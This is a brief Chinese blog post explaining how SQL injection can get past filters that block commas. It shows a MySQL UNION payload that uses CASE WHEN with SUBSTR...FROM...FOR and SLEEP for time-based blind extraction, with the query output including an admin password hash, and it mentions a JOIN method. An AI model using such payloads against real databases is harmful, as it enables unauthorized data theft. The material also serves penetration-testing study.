zoukankan      html  css  js  c++  java
  • SQL注入之逗号拦截绕过

    目前所知博主仅知的两个方法

    1.通过case when then

    2.join

    [一]case when then

    mysql> select * from lbcms_admin where adminname like "%a%" union select 1,2,3,4,5,6,7,case when substr(database() from 1 for 1) = 'l' then sleep(3) else 0 end;
    +----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
    | ID | adminName | adminPassWord | adminLov | adminConfig | adminClass | adminLock | adminDate |
    +----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
    | 1 | admin | a797ba2993304483f0d180e25d14319a | 520 | | NULL | SgrRUQ | 2010-04-14 00:00:00 |
    | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 0 |
    +----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
    2 rows in set (3.00 sec)

      相关知识[1]https://www.cnblogs.com/nul1/p/8727873.html

    case when 条件1 then 条件2 else 条件3 end;       #如果条件1成立就执行条件2否则执行条件3 

      相关知识[2]https://www.cnblogs.com/nul1/p/9297045.html

    from 1 for 1 #分页,前面的1代表截第几个,后面的1代表截取的长度.

    [二]join

     https://www.cnblogs.com/i-honey/p/8203954.html

  • 相关阅读:
    day66
    1
    day65
    BeautifulSoup
    day60
    day59
    day49
    day48
    [S5PV210] PWM
    [S5PV210] Clock
  • 原文地址:https://www.cnblogs.com/nul1/p/9333599.html
Copyright © 2011-2022 走看看